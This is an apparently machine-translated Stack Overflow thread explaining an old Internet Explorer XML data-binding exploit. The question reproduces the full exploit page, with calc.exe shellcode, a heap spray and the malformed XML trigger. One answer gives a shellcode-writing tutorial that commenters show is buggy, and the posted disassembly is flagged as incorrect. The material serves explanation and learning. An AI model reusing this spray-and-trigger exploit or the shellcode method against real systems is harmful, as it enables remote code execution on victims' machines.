milw0rm นี้ทำงานอย่างไร


145

ฉันมักจะไม่มีปัญหาในการอ่านรหัส JavaScript แต่สำหรับอันนี้ฉันไม่สามารถหาเหตุผลได้ รหัสนี้มาจากช่องโหว่ที่เผยแพร่เมื่อ 4 วันก่อน คุณสามารถค้นหาได้ที่milw0rm

นี่คือรหัส:

<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

นี่คือสิ่งที่ฉันเชื่อว่ามันทำและฉันต้องการให้คุณช่วยฉันในส่วนที่ฉันเข้าใจผิด

ตัวแปรมีรหัสเพื่อเปิดshellcode calc.exeฉันไม่เข้าใจว่าพวกเขาพบสตริงแปลก ๆ ความคิดใด ๆ

sprayสิ่งที่สองคือตัวแปร ฉันไม่เข้าใจห่วงแปลก ๆ นี้

สิ่งที่สามคือตัวแปรmemoryที่ไม่เคยใช้ที่ใดก็ได้ ทำไมพวกเขาสร้างมันขึ้นมา?

สิ่งสุดท้าย: แท็ก XML ทำในหน้าอะไร


ในขณะที่ฉันมีคำตอบที่ดี แต่ส่วนใหญ่ทั่วไปมาก ฉันต้องการคำอธิบายเพิ่มเติมเกี่ยวกับมูลค่าของรหัส unescape("%u0a0a%u0a0a");ตัวอย่างคือ มันหมายความว่าอะไร? สิ่งที่เหมือนกันสำหรับวง: ทำไมเขียนนักพัฒนา: length < 0xd0000? ฉันต้องการความเข้าใจที่ลึกซึ้งยิ่งขึ้นไม่เพียง แต่ทฤษฎีของรหัสนี้


คุณควรมองไปที่ Heap Spraying: en.wikipedia.org/wiki/Heap_spraying
BobbyShaftoe

เราจะเรียกใช้การหาประโยชน์ได้อย่างไร? เราต้องเรียกใช้ใน IE หรือไม่?
bad_keypoints

คำตอบ:


320

shellcode มีคำแนะนำในแอสเซมบลี x86 บางอย่างที่จะทำการหาประโยชน์ที่แท้จริง สร้างลำดับยาวของคำสั่งที่จะถูกวางในspray memoryเนื่องจากโดยปกติเราไม่สามารถหาตำแหน่งที่แน่นอนของ shellcode ของเราในหน่วยความจำเราจึงใส่nopคำสั่งจำนวนมากไว้ก่อนแล้วข้ามไปที่อื่น memoryอาร์เรย์จะถือรหัส x86 ที่เกิดขึ้นจริงพร้อมกับกลไกการกระโดด เราจะป้อน XML ที่สร้างขึ้นไปยังไลบรารีที่มีข้อบกพร่อง เมื่อมีการแยกวิเคราะห์ข้อผิดพลาดจะทำให้ตัวชี้คำสั่งลงทะเบียนถูกกำหนดให้กับบางแห่งในช่องโหว่ของเราซึ่งนำไปสู่การใช้รหัสโดยอำเภอใจ

เพื่อให้เข้าใจอย่างลึกซึ้งยิ่งขึ้นคุณควรเข้าใจว่ามีอะไรในรหัส x86 unscapeจะถูกใช้เพื่อวางลำดับของไบต์ที่แทนค่าของสตริงในsprayตัวแปร มันเป็นรหัส x86 ที่ถูกต้องที่เติมกองข้อมูลขนาดใหญ่และข้ามไปยังจุดเริ่มต้นของ shellcode เหตุผลสำหรับเงื่อนไขสิ้นสุดคือข้อจำกัดความยาวของสตริงของเอ็นจิ้นการเขียนสคริปต์ คุณไม่สามารถมีสตริงที่มีขนาดใหญ่กว่าความยาวที่ระบุได้

ใน x86 ประกอบการแสดงให้เห็นถึง0a0a or cl, [edx]สิ่งนี้เทียบเท่ากับnopคำสั่งเพื่อวัตถุประสงค์ในการหาประโยชน์ของเราอย่างมีประสิทธิภาพ ทุกที่ที่เราข้ามไปในsprayเราจะไปที่คำสั่งต่อไปจนกว่าเราจะไปถึง shellcode ซึ่งเป็นรหัสที่เราต้องการเรียกใช้จริง

หากคุณดูที่ XML คุณจะเห็น0x0a0aว่ามีอยู่ด้วย การอธิบายสิ่งที่เกิดขึ้นต้องมีความรู้เฉพาะเกี่ยวกับการหาประโยชน์ (คุณต้องรู้ว่าข้อผิดพลาดนั้นอยู่ที่ไหนและวิธีการใช้ประโยชน์อย่างไรซึ่งฉันไม่รู้) อย่างไรก็ตามดูเหมือนว่าเราบังคับให้ Internet Explorer เรียกรหัสรถโดยการตั้งค่าinnerHtmlสตริง XML ที่เป็นอันตรายนั้น Internet Explorer พยายามที่จะแยกวิเคราะห์และรหัสรถที่ให้การควบคุมตำแหน่งของหน่วยความจำที่มีอยู่อาร์เรย์ (เนื่องจากเป็นก้อนใหญ่ความน่าจะเป็นของการกระโดดมีสูง) เมื่อเรากระโดดไปที่นั่น CPU จะยังคงประมวลผลor cl, [edx]คำสั่งจนกระทั่งถึงจุดเริ่มต้นของ shellcode ที่ใส่ในหน่วยความจำ

ฉันได้ทำการถอด shellcode ออกแล้ว:

00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

การทำความเข้าใจ shellcode นี้จำเป็นต้องมีความรู้การประกอบ x86 และปัญหาในไลบรารีของ MS เอง (เพื่อทราบสถานะของระบบเมื่อเราไปถึงที่นี่) ไม่ใช่ JavaScript! calc.exeรหัสนี้จะเปิดดำเนินการ


13
ฉันขอขอบคุณสำหรับความพยายามนี้จากคุณสำหรับการอธิบายนี้ +25 ชื่อเสียงและความเคารพของฉันทั้งหมด ขอบคุณ
Patrick Desjardins

20
คำตอบที่ดี แต่เจ้านายที่ดี - ทันใดนั้นฉันไม่ดีกับคอมพิวเตอร์ ;-)
ชื่อผู้ใช้

50
ฉันประหลาดใจกับคนที่จัดการหาช่องโหว่ประเภทนี้ หากพวกเขาฉลาดพอที่จะแฮ็คบัญชีธนาคารของใครบางคนพวกเขาก็สมควรได้รับเงินทั้งหมดที่พวกเขาสามารถขโมยได้)
Martin

8
หากมีคำตอบที่ดีสำหรับศาลเจ้าสิ่งนี้จะอยู่ในนั้น
San Jacinto

6
Disassemby ดูเหมือนไร้สาระและสุ่มสมบูรณ์ มันไม่ถูกต้อง ฉันพยายามสลับไบต์โดยสมมติว่าอักขระในสายอักขระถูกเก็บไว้ในรูปเล็ก ๆ น้อย ๆ แต่ก็ไม่ได้ช่วยอะไร
Juho Östman

10

ดูเหมือนว่าเป็นการหาประโยชน์ของข้อผิดพลาดล่าสุดของ Internet Explorerที่ Microsoft เปิดตัว patch ฉุกเฉินสำหรับ มันใช้ข้อบกพร่องในคุณสมบัติ databinding ของตัวจัดการ XML ของ Microsoft ซึ่งทำให้หน่วยความจำฮีปถูกจัดสรรคืนอย่างไม่ถูกต้อง

Shellcode เป็นรหัสเครื่องที่จะทำงานเมื่อเกิดข้อผิดพลาด สเปรย์และหน่วยความจำเป็นเพียงพื้นที่บางส่วนที่จัดสรรไว้บนฮีปเพื่อช่วยให้เกิดสภาพที่เป็นประโยชน์


คุณคิดว่าบางสิ่งนั้นอาจเกิดขึ้นกับส่วนขยายของ Chrome หรือไม่
bad_keypoints


2

เมื่อใดก็ตามที่ฉันเห็นหน่วยความจำที่ไม่ได้รับการกล่าวถึงในการหาประโยชน์ความคิดแรกของฉันคือการหาประโยชน์เป็นบัฟเฟอร์โอเวอร์โฟลบางประเภทซึ่งในกรณีนี้หน่วยความจำอาจทำให้บัฟเฟอร์ล้นหรือถูกเข้าถึงเมื่อบัฟเฟอร์โอเวอร์โฟลว์ .


ในกรณีนี้มันไม่ใช่ความเสียหายของฮีปการโอเวอร์เฮดของ
Grant Wagner


0

ดูเข้ารหัสตัวอักษรใน HTML

มันเป็นข้อมูลไบนารีที่เข้ารหัสเป็นสตริงซึ่ง JavaScript กำลังถอดรหัส

รูปแบบทั่วไปของXSSด้วย

คุณสามารถดูเทคนิคการเข้ารหัสทั้งหมดได้ที่นี่:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project


0

ตัวอย่าง shellcode ง่าย ๆ

สวัสดีชาวโลกในการชุมนุมที่ & t ซินแท็คซ์ x86 ฉันเชื่อว่า (Wizard in Training)

ตั้งค่าไฟล์:vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

two:
 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

one:
 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 
                            #^-addresses

รวบรวมเช่นนั้น:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

ตอนนี้คุณมีไบนารี่ที่พิมพ์คำว่าสวัสดีโลก การแปลงไบนารีเป็นประเภทรหัสเปลือกใน:objdump -D shellcode

คุณจะได้รับผลลัพธ์:

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

ตอนนี้ถ้าคุณดูข้อความบรรทัดที่ 4 คุณจะเห็น: 400078: eb 1a jmp 0x400094

ส่วนที่ระบุว่าeb 1aเป็นตัวแทนเลขฐานสิบหกของคำสั่งการชุมนุมjmp oneที่ "หนึ่ง" เป็นที่อยู่หน่วยความจำของสตริงของคุณ

เพื่อเตรียม shellcode ของคุณสำหรับการดำเนินการเปิดไฟล์ข้อความอื่นและเก็บค่าฐานสิบหกในอาร์เรย์อักขระ ในการจัดรูปแบบรหัสเชลล์ให้ถูกต้องคุณต้องพิมพ์\xก่อนหน้าทุกค่าฐานสิบหก

ตัวอย่างเชลล์โค้ดที่กำลังจะมาจะมีลักษณะดังต่อไปนี้ตามเอาต์พุตคำสั่ง objdump:

unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

ตัวอย่างนี้ใช้ C สำหรับอาร์เรย์ ตอนนี้คุณมี shellcode ที่ใช้งานได้ซึ่งจะเขียนถึง stdout "hello world"

คุณสามารถทดสอบรหัสเชลล์โดยวางลงในช่องโหว่หรือคุณสามารถเขียนโปรแกรม c ต่อไปนี้เพื่อทดสอบ:

vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}

ในการรวบรวมประเภทโปรแกรมใน:

gcc -fno-stack-protector -z execstack execShellcode.cc -o run

ทำงานกับ./run คุณรู้ว่ามีตัวอย่างการทำงานของการพัฒนา shellcode อย่างง่ายที่ทดสอบใน linux mint / debian


1
อย่าใช้int 0x80ABI 32- บิตในรหัส 64- บิต มันจะล้มเหลวสำหรับสตริงบนสแต็กเนื่องจากเคอร์เนลดูที่ syscall ต่ำกว่า 32 บิตเท่านั้น จะเกิดอะไรขึ้นถ้าคุณใช้ 32-bit int 0x80 Linux ABI ในรหัส 64- บิต? . (ในกรณีนี้คุณจะสร้างวงวนไม่สิ้นสุดเพราะsys_writeจะกลับมา-EFAULTและmov $1, %alปล่อยให้บิตบนตั้งไว้ดังนั้นคุณจะได้รับ-ENOSYSแทนที่จะเป็น sys_exit) นอกจากนี้ในรหัส 64 บิตคุณสามารถjmpส่งต่อสายและใช้ RIP แบบสัมพันธ์leaเพื่อรับที่อยู่แทนการโทร / ป๊อป
Peter Cordes

1
สิ่งนี้จะล้มเหลวสำหรับ gcc ที่สร้าง PIE executables โดยค่าเริ่มต้นเพราะเช่นนั้นแม้อาร์เรย์ char ที่เก็บข้อมูลแบบคงที่ของคุณจะอยู่นอก 32 บิตที่ต่ำ (และ BTW ถ้าเป็นเช่นconst char payload[]นั้นมันจะอยู่ในส่วนข้อความ (ในส่วน .rodata) และคุณไม่จำเป็นต้อง-z execstackใช้)
Peter Cordes

1
นอกจากนี้ยังmovl 4, %raxมีศูนย์ไบต์ (และจะไม่รวมกันเนื่องจากขนาดไม่ถูกต้องตัวถูกดำเนินการและหายไป$ดังนั้น 4 เป็นที่อยู่ที่แน่นอน) ฉันคิดว่าคุณโพสต์แหล่งที่มาเวอร์ชันแรกของคุณ ความคิดเห็นก่อนหน้าของฉันมาจากการดูการถอดแยกชิ้นส่วนที่คุณเพิ่มการsys_exitโทร
Peter Cordes
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.